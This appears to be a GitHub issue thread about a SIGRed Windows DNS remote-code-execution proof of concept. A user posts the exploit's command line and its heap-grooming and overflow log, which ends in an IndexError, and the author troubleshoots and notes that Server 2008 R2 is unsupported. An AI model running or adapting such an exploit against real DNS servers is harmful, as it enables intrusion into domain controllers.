chompie1337
commented
3 years ago What is the contents of heapleakb64?
Closed russokiwi closed 3 years ago
chompie1337
commented
3 years ago What is the contents of heapleakb64?
russokiwi
commented
3 years ago ;; connection timed out; no servers could be reached
chompie1337
commented
3 years ago How long does it take to run? I would recommend looking at a network capture to make sure traffic is flowing correctly
russokiwi
commented
3 years ago about 15 minutes, though seems a bit slow - all on a gigabit lan. Traffic seems to be flowing I can see in windows DNS logs, DNS service is rebooting itself.. The DC is 2008 R2 BTW.
chompie1337
commented
3 years ago 2008 R2 is not supported with this exploit. Itβs possible to rework it for that version. See the accompanying blogpost - exercise is left up to the reader π
Hi,
I'm getting the following when attempting to exploit. Any ideas ?
β# python3 exploit.py -ip 10.0.2.100 -d vbsigred.com [!] grooming small buffer size freelist Waiting for small cached records to be freed 0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163 [!] doing DNS record heap spray [!] waiting for target subdomain record to be freed 0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123 [!] triggering realloc and overflow [!] triggering free for fake timeout object [!] triggering timeout object allocations [!] triggering frees for heap ptr leak [!] triggering heap ptr leak Traceback (most recent call last): File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 259, in
main()
File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 255, in main
do_rce(args.ip, args.domain)
File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 117, in do_rce
hl64_bytes = sigs[11].encode('ascii')
IndexError: list index out of range